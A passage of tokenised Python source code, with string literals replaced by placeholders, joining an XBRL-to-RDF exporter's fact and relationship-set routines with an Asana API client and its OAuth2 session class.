add ( ( rt_uri , ArcRoleType . roleUri , URIRef ( modelArcroleType . arcroleURI ) ) ) <EOL> g . add ( ( rt_uri , ArcRoleType . definition , L ( modelArcroleType . definition ) ) ) <EOL> g . add ( ( rt_uri , ArcRoleType . cyclesAllowed , ArcRoleCycles [ modelArcroleType . cyclesAllowed ] ) ) <EOL> for qn in modelArcroleType . usedOns : <EOL> usedOnConcept = self . modelXbrl . qnameConcepts [ qn ] <EOL> g . add ( ( rt_uri , ArcRoleType . usedOn , modelObjectUri ( usedOnConcept ) ) ) <EOL> activity = "<STR_LIT>" + modelDocument . uri <EOL> '''<STR_LIT>''' <EOL> def insertAspectProxies ( self , qnames , g ) : <EOL> aspectQnames = [ qname <EOL> for qname in qnames <EOL> if qname not in self . aspect_proxy_uri and qname in self . modelXbrl . qnameConcepts ] <EOL> for qname in aspectQnames : <EOL> self . insertAspectProxy ( qname , <EOL> URIRef ( "<STR_LIT>" . format ( self . reportURI , qnamePrefix_Name ( qname ) ) ) , <EOL> g ) <EOL> def insertAspectProxy ( self , aspectQName , aspectProxyUri , g ) : <EOL> concept = self . modelXbrl . qnameConcepts [ aspectQName ] <EOL> g . add ( ( aspectProxyUri , RDF . type , DTS . AspectProxy ) ) <EOL> g . add ( ( aspectProxyUri , DTS . aspect , modelObjectUri ( concept ) ) ) <EOL> g . add ( ( aspectProxyUri , DTS . report , self . reportURI ) ) <EOL> g . add ( ( self . reportURI , DTS . aspectProxy , aspectProxyUri ) ) <EOL> self . aspect_proxy_uri [ aspectQName ] = aspectProxyUri <EOL> def aspectQnameProxyURI ( self , qname ) : <EOL> if hasattr ( qname , "<STR_LIT>" ) : <EOL> return self . aspect_proxy_uri . get ( qname . qname ) <EOL> elif qname in self . modelXbrl . qnameConcepts : <EOL> return self . aspect_proxy_uri . get ( qname ) <EOL> return None <EOL> def insertDataPoints ( self , g ) : <EOL> self . showStatus ( "<STR_LIT>" ) <EOL> dimensions = [ ] <EOL> dimensionIds = { } <EOL> if self . modelXbrl . modelDocument . type in ( Type . INSTANCE , Type . INLINEXBRL ) : <EOL> contextAspectValueSelections = { } <EOL> unitIDs = set ( ) <EOL> periodURIs = { } <EOL> entityIdentifierURIs = { } <EOL> for fact in self . modelXbrl . factsInInstance : <EOL> factUri = modelObjectUri ( fact ) <EOL> docUri = modelObjectDocumentUri ( fact ) <EOL> baseXsdType = fact . concept . baseXsdType if fact . concept is not None else None <EOL> g . add ( ( factUri , RDF . type , XBRL . DataPoint ) ) <EOL> g . add ( ( docUri , XBRL . dataPoint , factUri ) ) <EOL> g . add ( ( factUri , XBRL . document , docUri ) ) <EOL> self . insertAspectProxies ( ( fact . qname , ) , g ) <EOL> g . add ( ( factUri , XBRL . baseItem , self . aspectQnameProxyURI ( fact . qname ) ) ) <EOL> g . add ( ( factUri , XML . id , L ( XmlUtil . elementFragmentIdentifier ( fact ) ) ) ) <EOL> g . add ( ( factUri , XML . sourceLine , L ( fact . sourceline ) ) ) <EOL> context = fact . context <EOL> concept = fact . concept <EOL> if context is not None : <EOL> if context . entityIdentifier not in entityIdentifierURIs : <EOL> entityScheme , entityIdentifier = context . entityIdentifier <EOL> entityIdentifierUri = URIRef ( "<STR_LIT>" . format ( <EOL> self . reportURI , <EOL> qnamePrefix_Name ( XbrlConst . qnXbrliIdentifier ) , <EOL> entityIdentifier ) ) <EOL> self . insertAspectProxy ( XbrlConst . qnXbrliIdentifier , entityIdentifierUri , g ) <EOL> g . add ( ( entityIdentifierUri , RDF . type , DTS . EntityIdentifier ) ) <EOL> g . add ( ( entityIdentifierUri , XBRLI . scheme , L ( entityScheme ) ) ) <EOL> g . add ( ( entityIdentifierUri , XBRLI . identifier , L ( entityIdentifier ) ) ) <EOL> entityIdentifierURIs [ context . entityIdentifier ] = entityIdentifierUri <EOL> else : <EOL> entityIdentifierUri = entityIdentifierURIs [ context . entityIdentifier ] <EOL> g . add ( ( factUri , XBRLI . EntityIdentifier , entityIdentifierUri ) ) <EOL> if context . isForeverPeriod : <EOL> period = "<STR_LIT>" <EOL> if context . isInstantPeriod : <EOL> endDate = XmlUtil . dateunionValue ( context . instantDatetime , subtractOneDay = True ) . replace ( '<STR_LIT::>' , '<STR_LIT:_>' ) <EOL> period = "<STR_LIT>" . format ( endDate ) <EOL> else : <EOL> startDate = XmlUtil . dateunionValue ( context . startDatetime ) . replace ( '<STR_LIT::>' , '<STR_LIT:_>' ) <EOL> endDate = XmlUtil . dateunionValue ( context . endDatetime , subtractOneDay = True ) . replace ( '<STR_LIT::>' , '<STR_LIT:_>' ) <EOL> period = "<STR_LIT>" . format ( startDate , endDate ) <EOL> if period not in periodURIs : <EOL> periodUri = URIRef ( "<STR_LIT>" . format ( self . reportURI , period ) ) <EOL> self . insertAspectProxy ( XbrlConst . qnXbrliPeriod , periodUri , g ) <EOL> g . add ( ( periodUri , RDF . type , DTS . Period ) ) <EOL> g . add ( ( periodUri , XBRL . isForever , L ( context . isForeverPeriod ) ) ) <EOL> g . add ( ( periodUri , XBRL . isInstant , L ( context . isInstantPeriod ) ) ) <EOL> if context . isStartEndPeriod : <EOL> d = context . startDatetime <EOL> if d . hour == <NUM_LIT:0> and d . minute == <NUM_LIT:0> and d . second == <NUM_LIT:0> : <EOL> d = d . date ( ) <EOL> g . add ( ( periodUri , XBRLI . startDate , L ( d ) ) ) <EOL> if context . isStartEndPeriod or context . isInstantPeriod : <EOL> d = context . endDatetime <EOL> if d . hour == <NUM_LIT:0> and d . minute == <NUM_LIT:0> and d . second == <NUM_LIT:0> : <EOL> d = ( d - datetime . timedelta ( <NUM_LIT:1> ) ) . date ( ) <EOL> g . add ( ( periodUri , XBRLI . endDate , L ( d ) ) ) <EOL> periodURIs [ period ] = periodUri <EOL> else : <EOL> periodUri = periodURIs [ period ] <EOL> g . add ( ( factUri , XBRLI . Period , periodUri ) ) <EOL> contextUri = modelObjectUri ( context ) <EOL> g . add ( ( factUri , XBRLI . contextId , L ( context . id ) ) ) <EOL> if context . id not in contextAspectValueSelections : <EOL> contextAspectValueSelection = [ ] <EOL> contextAspectValueSelections [ context . id ] = contextAspectValueSelection <EOL> for dimVal in context . qnameDims . values ( ) : <EOL> dimUri = modelObjectUri ( dimVal ) <EOL> self . insertAspectProxy ( dimVal . dimensionQname , dimUri , g ) <EOL> g . add ( ( dimUri , RDF . type , DTS . AspectValueSelection ) ) <EOL> contextAspectValueSelection . append ( dimUri ) <EOL> if dimVal . isExplicit : <EOL> self . insertAspectProxies ( ( dimVal . memberQname , ) , g ) <EOL> g . add ( ( dimUri , XBRLI . AspectValue , self . aspectQnameProxyURI ( dimVal . memberQname ) ) ) <EOL> else : <EOL> g . add ( ( dimUri , DTS . typedValue , L ( dimVal . typedMember . stringValue ) ) ) <EOL> else : <EOL> contextAspectValueSelection = contextAspectValueSelections [ context . id ] <EOL> for aspectValueSelectionUri in contextAspectValueSelection : <EOL> g . add ( ( factUri , XBRLI . aspectValueSelection , aspectValueSelectionUri ) ) <EOL> if fact . isNumeric : <EOL> if fact . precision == "<STR_LIT>" : <EOL> g . add ( ( factUri , XBRLI . precision , L ( "<STR_LIT>" ) ) ) <EOL> elif fact . precision is not None : <EOL> g . add ( ( factUri , XBRLI . precision , L ( fact . precision , datatype = XSD . integer ) ) ) <EOL> if fact . decimals == "<STR_LIT>" : <EOL> g . add ( ( factUri , XBRLI . decimals , L ( "<STR_LIT>" ) ) ) <EOL> elif fact . decimals is not None : <EOL> g . add ( ( factUri , XBRLI . decimals , L ( fact . decimals , datatype = XSD . integer ) ) ) <EOL> if fact . unit is not None : <EOL> unit = fact . unit <EOL> unitUri = modelObjectUri ( unit ) <EOL> g . add ( ( factUri , XBRLI . unit , unitUri ) ) <EOL> g . add ( ( factUri , XBRLI . unitId , L ( unit . id ) ) ) <EOL> if unit . id not in unitIDs : <EOL> unitIDs . add ( unit . id ) <EOL> self . insertAspectProxy ( XbrlConst . qnXbrliUnit , unitUri , g ) <EOL> g . add ( ( unitUri , RDF . type , DTS . Unit ) ) <EOL> g . add ( ( docUri , XBRL . defines , unitUri ) ) <EOL> mults , divs = unit . measures <EOL> for qn in mults : <EOL> qnUri = qnameUri ( qn ) <EOL> g . add ( ( unitUri , Unit . multiply , qnUri ) ) <EOL> g . add ( ( qnUri , RDF . type , XBRL . Measure ) ) <EOL> for qn in divs : <EOL> qnUri = qnameUri ( qn ) <EOL> g . add ( ( unitUri , Unit . divide , qnUri ) ) <EOL> g . add ( ( qnUri , RDF . type , XBRL . Measure ) ) <EOL> if fact . xmlLang is None and fact . concept is not None and fact . concept . baseXsdType is not None : <EOL> g . add ( ( factUri , DataPoint . value , L ( fact . xValue , datatype = XSD [ concept . baseXsdType ] ) ) ) <EOL> elif fact . xmlLang is not None : <EOL> g . add ( ( factUri , DataPoint . value , L ( fact . value , lang = fact . xmlLang ) ) ) <EOL> else : <EOL> g . add ( ( factUri , DataPoint . value , L ( fact . value ) ) ) <EOL> if fact . modelTupleFacts : <EOL> g . add ( ( factUri , RDF . type , XBRL . tuple ) ) <EOL> for tupleFact in fact . modelTupleFacts : <EOL> g . add ( ( factUri , XBRLI . tuple , modelObjectUri ( tupleFact ) ) ) <EOL> if self . modelXbrl . modelDocument . type in ( Type . INSTANCE , Type . INLINEXBRL ) : <EOL> for fact in self . modelXbrl . factsInInstance : <EOL> factUri = modelObjectUri ( fact ) <EOL> def insertRelationshipSets ( self , g ) : <EOL> self . showStatus ( "<STR_LIT>" ) <EOL> entryUrl = URIRef ( modelObjectDocumentUri ( self . modelXbrl ) ) <EOL> aspectQnamesUsed = set ( ) <EOL> for i , relationshipSetKey in enumerate ( self . relationshipSets ) : <EOL> arcrole , linkrole , linkqname , arcqname = relationshipSetKey <EOL> if linkqname : <EOL> aspectQnamesUsed . add ( linkqname ) <EOL> if arcqname : <EOL> aspectQnamesUsed . add ( arcqname ) <EOL> self . insertAspectProxies ( aspectQnamesUsed , g ) <EOL> relSetURIs = { } <EOL> for i , relationshipSetKey in enumerate ( self . relationshipSets ) : <EOL> arcrole , linkrole , linkqname , arcqname = relationshipSetKey <EOL> if arcrole not in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) and linkrole and linkqname and arcqname : <EOL> relSetUri = URIRef ( "<STR_LIT>" . format ( <EOL> self . filingURI , <EOL> os . path . basename ( arcrole ) , <EOL> os . path . basename ( linkrole ) ) ) <EOL> relSetURIs [ relationshipSetKey ] = relSetUri <EOL> g . add ( ( relSetUri , RDF . type , XBRL . RelationshipSet ) ) <EOL> g . add ( ( relSetUri , XBRL . arcrole , L ( arcrole ) ) ) <EOL> g . add ( ( relSetUri , XBRL . linkrole , L ( linkrole ) ) ) <EOL> g . add ( ( relSetUri , XBRL . arcname , self . aspectQnameProxyURI ( arcqname ) ) ) <EOL> g . add ( ( relSetUri , XBRL . linkname , self . aspectQnameProxyURI ( linkqname ) ) ) <EOL> g . add ( ( self . reportURI , XBRL . relationshipSet , relSetUri ) ) <EOL> g . add ( ( relSetUri , XBRL . report , self . reportURI ) ) <EOL> relE = [ ] <EOL> resources = set ( ) <EOL> aspectQnamesUsed = set ( ) <EOL> def walkTree ( rels , parentRelUri , seq , depth , relationshipSetKey , relationshipSet , visited , relSetUri , doVertices ) : <EOL> for rel in rels : <EOL> if rel not in visited : <EOL> visited . add ( rel ) <EOL> if not doVertices : <EOL> _relProp = { '<STR_LIT>' : L ( seq ) , <EOL> '<STR_LIT>' : L ( depth ) , <EOL> '<STR_LIT>' : L ( rel . orderDecimal ) , <EOL> '<STR_LIT>' : L ( rel . priority ) , <EOL> '<STR_LIT>' : relSetUri <EOL> } <EOL> if isinstance ( rel . fromModelObject , ModelConcept ) : <EOL> if doVertices : <EOL> aspectQnamesUsed . add ( rel . fromModelObject . qname ) <EOL> sourceUri = True <EOL> else : <EOL> sourceUri = self . aspectQnameProxyURI ( rel . fromModelObject . qname ) <EOL> sourceId = qnamePrefix_Name ( rel . fromModelObject . qname ) <EOL> else : <EOL> sourceUri = None <EOL> toModelObject = rel . toModelObject <EOL> if isinstance ( toModelObject , ModelConcept ) : <EOL> if doVertices : <EOL> aspectQnamesUsed . add ( toModelObject . qname ) <EOL> targetUri = True <EOL> else : <EOL> targetUri = self . aspectQnameProxyURI ( toModelObject . qname ) <EOL> targetId = qnamePrefix_Name ( toModelObject . qname ) <EOL> elif isinstance ( toModelObject , ModelResource ) : <EOL> if doVertices : <EOL> resources . add ( toModelObject ) <EOL> targetUri = <NUM_LIT:0> <EOL> else : <EOL> if rel . preferredLabel : <EOL> _relProp [ '<STR_LIT>' ] = URIRef ( rel . preferredLabel ) <EOL> if rel . arcrole in ( XbrlConst . all , XbrlConst . notAll ) : <EOL> _relProp [ '<STR_LIT>' ] = L ( rel . closed ) <EOL> elif rel . arcrole in ( XbrlConst . dimensionDomain , XbrlConst . domainMember ) : <EOL> _relProp [ '<STR_LIT>' ] = L ( rel . usable ) <EOL> elif rel . arcrole == XbrlConst . summationItem : <EOL> _relProp [ '<STR_LIT>' ] = L ( rel . weightDecimal ) <EOL> if relationshipSet . arcrole == "<STR_LIT>" : <EOL> _relProp [ '<STR_LIT>' ] = URIRef ( rel . arcrole ) <EOL> if toModelObject . role : <EOL> _relProp [ '<STR_LIT>' ] = URIRef ( toModelObject . role ) <EOL> targetUri = modelObjectUri ( toModelObject ) <EOL> targetId = toModelObject . modelDocument . basename + '<STR_LIT:#>' + XmlUtil . elementFragmentIdentifier ( toModelObject ) <EOL> else : <EOL> targetUri = None <EOL> if sourceUri is not None and targetUri is not None : <EOL> targetRelSetUri = relSetUri <EOL> targetRelSetKey = relationshipSetKey <EOL> if relationshipSet . arcrole == "<STR_LIT>" and rel . targetRole : <EOL> targetRelSet = self . modelXbrl . relationshipSet ( relationshipSet . arcrole , rel . targetRole ) <EOL> for i , relSetKey in enumerate ( self . relationshipSets ) : <EOL> arcrole , ELR , linkqname , arcqname = relSetKey <EOL> if arcrole == "<STR_LIT>" and ELR == rel . targetRole : <EOL> targetRelationshipSetUri = relSetURIs [ relSetKey ] <EOL> targetRelSetKey = relSetKey <EOL> break <EOL> if not doVertices : <EOL> _relProp [ '<STR_LIT>' ] = URIRef ( rel . targetRole ) <EOL> _relProp [ '<STR_LIT>' ] = URIRef ( targetRelationshipSetUri ) <EOL> else : <EOL> targetRelSetKey = relationshipSetKey <EOL> targetRelSet = relationshipSet <EOL> if doVertices : <EOL> relUri = None <EOL> else : <EOL> _relProp [ '<STR_LIT>' ] = sourceUri <EOL> _relProp [ '<STR_LIT:to>' ] = targetUri <EOL> _arcrole = os . path . basename ( rel . arcrole ) <EOL> relUri = URIRef ( "<STR_LIT>" . format ( <EOL> self . reportURI , <EOL> _arcrole , <EOL> os . path . basename ( rel . linkrole ) , <EOL> sourceId , <EOL> targetId ) ) <EOL> _relProp [ '<STR_LIT>' ] = relUri <EOL> relPredNS = Namespace ( "<STR_LIT>" <EOL> . format ( _arcrole ) ) <EOL> g . bind ( _arcrole , relPredNS ) <EOL> _relProp [ '<STR_LIT>' ] = relPredNS [ os . path . basename ( rel . linkrole ) ] <EOL> if parentRelUri is not None : <EOL> g . add ( ( parentRelUri , Relationship . child , relUri ) ) <EOL> _relProp [ '<STR_LIT>' ] = relationshipSetKey <EOL> relE . append ( _relProp ) <EOL> seq += <NUM_LIT:1> <EOL> seq = walkTree ( targetRelSet . fromModelObject ( toModelObject ) , relUri , seq , depth + <NUM_LIT:1> , targetRelSetKey , targetRelSet , visited , targetRelSetUri , doVertices ) <EOL> visited . remove ( rel ) <EOL> return seq <EOL> for doVertices in range ( <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ) : <EOL> for i , relationshipSetKey in enumerate ( self . relationshipSets ) : <EOL> arcrole , linkrole , linkqname , arcqname = relationshipSetKey <EOL> if arcrole not in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) and linkrole and linkqname and arcqname : <EOL> relSetUri = relSetURIs [ relationshipSetKey ] <EOL> relationshipSet = self . modelXbrl . relationshipSet ( * relationshipSetKey ) <EOL> seq = <NUM_LIT:1> <EOL> for rootConcept in relationshipSet . rootConcepts : <EOL> seq = walkTree ( relationshipSet . fromModelObject ( rootConcept ) , None , seq , <NUM_LIT:1> , relationshipSetKey , relationshipSet , set ( ) , relSetUri , doVertices ) <EOL> if doVertices : <EOL> if resources : <EOL> for resource in resources : <EOL> resourceUri = modelObjectUri ( resource ) <EOL> g . add ( ( resourceUri , RDF . type , XBRL . resource ) ) <EOL> g . add ( ( resourceUri , XBRL . value , L ( resource . stringValue ) ) ) <EOL> if resource . role : <EOL> g . add ( ( resourceUri , XBRL . role , L ( resource . role ) ) ) <EOL> self . insertAspectProxies ( aspectQnamesUsed , g ) <EOL> else : <EOL> for j , rel in enumerate ( relE ) : <EOL> relUri = rel [ '<STR_LIT>' ] <EOL> g . add ( ( rel [ '<STR_LIT>' ] , rel [ '<STR_LIT>' ] , rel [ '<STR_LIT:to>' ] ) ) <EOL> g . add ( ( relUri , RDF . type , XBRL . relationship ) ) <EOL> relSetUri = relSetURIs [ rel [ '<STR_LIT>' ] ] <EOL> g . add ( ( relUri , XBRL . relSet , relSetUri ) ) <EOL> g . add ( ( relSetUri , XBRL . relationship , relUri ) ) <EOL> if rel . get ( '<STR_LIT>' , <NUM_LIT:0> ) == <NUM_LIT:1> : <EOL> g . add ( ( relSetUri , XBRL . root , relUri ) ) <EOL> for k , v in rel . items ( ) : <EOL> if k not in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> g . add ( ( relUri , Relationship [ k ] , v ) ) <EOL> resources = None <EOL> def insertValidationResults ( self , g ) : <EOL> logEntries = [ ] <EOL> for handler in logging . getLogger ( "<STR_LIT>" ) . handlers : <EOL> if hasattr ( handler , "<STR_LIT>" ) : <EOL> logEntries = handler . dbHandlerLogEntries ( ) <EOL> break <EOL> messages = [ ] <EOL> messageRefs = [ ] <EOL> firstLogMessage = True <EOL> for i , logEntry in enumerate ( logEntries ) : <EOL> if firstLogMessage : <EOL> self . showStatus ( "<STR_LIT>" ) <EOL> firstLogMessage = False <EOL> messageUri = URIRef ( "<STR_LIT>" . format ( self . reportURI , i + <NUM_LIT:1> ) ) <EOL> g . add ( ( messageUri , RDF . type , XBRL . Message ) ) <EOL> g . add ( ( messageUri , XBRL . code , L ( logEntry [ '<STR_LIT:code>' ] ) ) ) <EOL> g . add ( ( messageUri , XBRL . level , L ( logEntry [ '<STR_LIT>' ] ) ) ) <EOL> g . add ( ( messageUri , XBRL . value , L ( logEntry [ '<STR_LIT:message>' ] [ '<STR_LIT:text>' ] ) ) ) <EOL> g . add ( ( messageUri , XBRL . report , self . reportURI ) ) <EOL> g . add ( ( self . reportURI , XBRL . message , messageUri ) ) <EOL> for ref in logEntry [ '<STR_LIT>' ] : <EOL> modelObject = self . modelXbrl . modelObject ( ref . get ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> aspectObj = None <EOL> if isinstance ( modelObject , ModelFact ) : <EOL> objUri = modelObjectUri ( modelObject ) <EOL> elif isinstance ( modelObject , ModelConcept ) : <EOL> self . insertAspectProxies ( ( modelObject . qname , ) , g ) <EOL> objUri = self . aspectQnameProxyURI ( modelObject . qname ) <EOL> elif isinstance ( modelObject , ModelRelationship ) : <EOL> sourceId = qnamePrefix_Name ( modelObject . fromModelObject . qname ) <EOL> toModelObject = modelObject . toModelObject <EOL> if isinstance ( toModelObject , ModelConcept ) : <EOL> targetId = qnamePrefix_Name ( toModelObject . qname ) <EOL> elif isinstance ( toModelObject , ModelResource ) : <EOL> targetId = toModelObject . modelDocument . basename + '<STR_LIT:#>' + XmlUtil . elementFragmentIdentifier ( toModelObject ) <EOL> else : <EOL> continue <EOL> objUri = URIRef ( "<STR_LIT>" . format ( <EOL> self . reportURI , <EOL> os . path . basename ( modelObject . arcrole ) , <EOL> os . path . basename ( modelObject . linkrole ) , <EOL> sourceId , <EOL> targetId ) ) <EOL> else : <EOL> continue <EOL> g . add ( ( objUri , XBRL . ref , messageUri ) ) <EOL> g . add ( ( messageUri , XBRL . message , objUri ) ) </s>
<s> from types import ModuleType <EOL> import json <EOL> import platform <EOL> import time <EOL> import requests <EOL> from . import error , resources , session , __version__ <EOL> from . page_iterator import CollectionPageIterator <EOL> try : <EOL> import urllib . parse as urlparse <EOL> except ImportError : <EOL> import urllib as urlparse <EOL> RESOURCE_CLASSES = { } <EOL> for name , module in resources . __dict__ . items ( ) : <EOL> if isinstance ( module , ModuleType ) and name . capitalize ( ) in module . __dict__ : <EOL> RESOURCE_CLASSES [ name ] = module . __dict__ [ name . capitalize ( ) ] <EOL> STATUS_MAP = { } <EOL> for name , Klass in error . __dict__ . items ( ) : <EOL> if isinstance ( Klass , type ) and issubclass ( Klass , error . AsanaError ) : <EOL> STATUS_MAP [ Klass ( ) . status ] = Klass <EOL> class Client : <EOL> """<STR_LIT>""" <EOL> DEFAULTS = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : <NUM_LIT:50> , <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> RETRY_DELAY = <NUM_LIT:1.0> <EOL> RETRY_BACKOFF = <NUM_LIT> <EOL> CLIENT_OPTIONS = set ( DEFAULTS . keys ( ) ) <EOL> QUERY_OPTIONS = set ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> REQUEST_OPTIONS = set ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:data>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> API_OPTIONS = set ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> ALL_OPTIONS = CLIENT_OPTIONS | QUERY_OPTIONS | REQUEST_OPTIONS | API_OPTIONS <EOL> def __init__ ( self , session = None , auth = None , ** options ) : <EOL> """<STR_LIT>""" <EOL> self . session = session or requests . Session ( ) <EOL> self . auth = auth <EOL> self . options = _merge ( self . DEFAULTS , options ) <EOL> for name , Klass in RESOURCE_CLASSES . items ( ) : <EOL> setattr ( self , name , Klass ( self ) ) <EOL> def request ( self , method , path , ** options ) : <EOL> """<STR_LIT>""" <EOL> options = self . _merge_options ( options ) <EOL> url = options [ '<STR_LIT>' ] + path <EOL> retry_count = <NUM_LIT:0> <EOL> request_options = self . _parse_request_options ( options ) <EOL> self . _add_version_header ( request_options ) <EOL> while True : <EOL> try : <EOL> response = getattr ( self . session , method ) ( url , auth = self . auth , ** request_options ) <EOL> if response . status_code in STATUS_MAP : <EOL> raise STATUS_MAP [ response . status_code ] ( response ) <EOL> elif response . status_code >= <NUM_LIT> and response . status_code < <NUM_LIT> : <EOL> raise error . ServerError ( response ) <EOL> else : <EOL> if options [ '<STR_LIT>' ] : <EOL> return response . json ( ) <EOL> else : <EOL> return response . json ( ) [ '<STR_LIT:data>' ] <EOL> except error . RetryableAsanaError as e : <EOL> if retry_count < options [ '<STR_LIT>' ] : <EOL> self . _handle_retryable_error ( e , retry_count ) <EOL> retry_count += <NUM_LIT:1> <EOL> else : <EOL> raise e <EOL> def _handle_retryable_error ( self , e , retry_count ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( e , error . RateLimitEnforcedError ) : <EOL> time . sleep ( e . retry_after ) <EOL> else : <EOL> time . sleep ( self . RETRY_DELAY * ( self . RETRY_BACKOFF ** retry_count ) ) <EOL> def get ( self , path , query , ** options ) : <EOL> """<STR_LIT>""" <EOL> api_options = self . _parse_api_options ( options , query_string = True ) <EOL> query_options = self . _parse_query_options ( options ) <EOL> parameter_options = self . _parse_parameter_options ( options ) <EOL> query = _merge ( query_options , api_options , parameter_options , query ) <EOL> return self . request ( '<STR_LIT>' , path , params = query , ** options ) <EOL> def get_collection ( self , path , query , ** options ) : <EOL> """<STR_LIT>""" <EOL> options = self . _merge_options ( options ) <EOL> if options [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> return CollectionPageIterator ( self , path , query , options ) . items ( ) <EOL> if options [ '<STR_LIT>' ] is None : <EOL> return self . get ( path , query , ** options ) <EOL> raise Exception ( '<STR_LIT>' + str ( options [ '<STR_LIT>' ] ) ) <EOL> def post ( self , path , data , ** options ) : <EOL> """<STR_LIT>""" <EOL> parameter_options = self . _parse_parameter_options ( options ) <EOL> body = { <EOL> '<STR_LIT:data>' : _merge ( parameter_options , data ) , <EOL> '<STR_LIT>' : self . _parse_api_options ( options ) <EOL> } <EOL> return self . request ( '<STR_LIT>' , path , data = body , headers = { '<STR_LIT>' : '<STR_LIT:application/json>' } , ** options ) <EOL> def put ( self , path , data , ** options ) : <EOL> """<STR_LIT>""" <EOL> parameter_options = self . _parse_parameter_options ( options ) <EOL> body = { <EOL> '<STR_LIT:data>' : _merge ( parameter_options , data ) , <EOL> '<STR_LIT>' : self . _parse_api_options ( options ) <EOL> } <EOL> return self . request ( '<STR_LIT>' , path , data = body , headers = { '<STR_LIT>' : '<STR_LIT:application/json>' } , ** options ) <EOL> def delete ( self , path , data , ** options ) : <EOL> """<STR_LIT>""" <EOL> return self . request ( '<STR_LIT>' , path , ** options ) <EOL> def _merge_options ( self , * objects ) : <EOL> """<STR_LIT>""" <EOL> return _merge ( self . options , * objects ) <EOL> def _parse_query_options ( self , options ) : <EOL> """<STR_LIT>""" <EOL> return self . _select_options ( options , self . QUERY_OPTIONS ) <EOL> def _parse_parameter_options ( self , options ) : <EOL> """<STR_LIT>""" <EOL> return self . _select_options ( options , self . ALL_OPTIONS , invert = True ) <EOL> def _parse_api_options ( self , options , query_string = False ) : <EOL> """<STR_LIT>""" <EOL> api_options = self . _select_options ( options , self . API_OPTIONS ) <EOL> if query_string : <EOL> query_api_options = { } <EOL> for key in api_options : <EOL> if isinstance ( api_options [ key ] , ( list , tuple ) ) : <EOL> query_api_options [ '<STR_LIT>' + key ] = '<STR_LIT:U+002C>' . join ( api_options [ key ] ) <EOL> else : <EOL> query_api_options [ '<STR_LIT>' + key ] = api_options [ key ] <EOL> return query_api_options <EOL> else : <EOL> return api_options <EOL> def _parse_request_options ( self , options ) : <EOL> """<STR_LIT>""" <EOL> request_options = self . _select_options ( options , self . REQUEST_OPTIONS ) <EOL> if '<STR_LIT>' in request_options : <EOL> params = request_options [ '<STR_LIT>' ] <EOL> for key in params : <EOL> if isinstance ( params [ key ] , bool ) : <EOL> params [ key ] = json . dumps ( params [ key ] ) <EOL> if '<STR_LIT:data>' in request_options : <EOL> if '<STR_LIT>' in request_options [ '<STR_LIT:data>' ] and len ( request_options [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] ) == <NUM_LIT:0> : <EOL> del request_options [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] <EOL> request_options [ '<STR_LIT:data>' ] = json . dumps ( request_options [ '<STR_LIT:data>' ] ) <EOL> return request_options <EOL> def _select_options ( self , options , keys , invert = False ) : <EOL> """<STR_LIT>""" <EOL> options = self . _merge_options ( options ) <EOL> result = { } <EOL> for key in options : <EOL> if ( invert and key not in keys ) or ( not invert and key in keys ) : <EOL> result [ key ] = options [ key ] <EOL> return result <EOL> def _add_version_header ( self , options ) : <EOL> """<STR_LIT>""" <EOL> headers = options . setdefault ( '<STR_LIT>' , { } ) <EOL> headers [ '<STR_LIT>' ] = self . _versionHeader ( ) <EOL> _cached_version_header = None <EOL> def _versionHeader ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . _cached_version_header : <EOL> self . _cached_version_header = urlparse . urlencode ( <EOL> self . _versionValues ( ) ) <EOL> return self . _cached_version_header <EOL> def _versionValues ( self ) : <EOL> """<STR_LIT>""" <EOL> return { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:version>' : __version__ , <EOL> '<STR_LIT>' : platform . python_version ( ) , <EOL> '<STR_LIT>' : platform . system ( ) , <EOL> '<STR_LIT>' : platform . release ( ) <EOL> } <EOL> @ classmethod <EOL> def basic_auth ( Klass , apiKey ) : <EOL> """<STR_LIT>""" <EOL> return Klass ( auth = requests . auth . HTTPBasicAuth ( apiKey , '<STR_LIT>' ) ) <EOL> @ classmethod <EOL> def access_token ( Klass , accessToken ) : <EOL> """<STR_LIT>""" <EOL> return Klass ( session . AsanaOAuth2Session ( token = { '<STR_LIT>' : accessToken } ) ) <EOL> @ classmethod <EOL> def oauth ( Klass , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return Klass ( session . AsanaOAuth2Session ( ** kwargs ) ) <EOL> def _merge ( * objects ) : <EOL> """<STR_LIT>""" <EOL> result = { } <EOL> [ result . update ( obj ) for obj in objects ] <EOL> return result </s>
<s> import requests <EOL> import requests_oauthlib <EOL> class AsanaOAuth2Session ( requests_oauthlib . OAuth2Session ) : <EOL> """<STR_LIT>""" <EOL> authorize_url = '<STR_LIT>' <EOL> token_url = '<STR_LIT>' <EOL> def __init__ ( self , client_secret = None , ** kwargs ) : <EOL> super ( AsanaOAuth2Session , self ) . __init__ ( ** kwargs ) <EOL> self . client_secret = client_secret <EOL> def authorization_url ( self ) : <EOL> """<STR_LIT>""" <EOL> return super ( AsanaOAuth2Session , self ) . authorization_url ( self . authorize_url ) <EOL> def fetch_token ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( AsanaOAuth2Session , self ) . fetch_token ( self . token_url , client_secret = self . client_secret , ** kwargs ) </s>
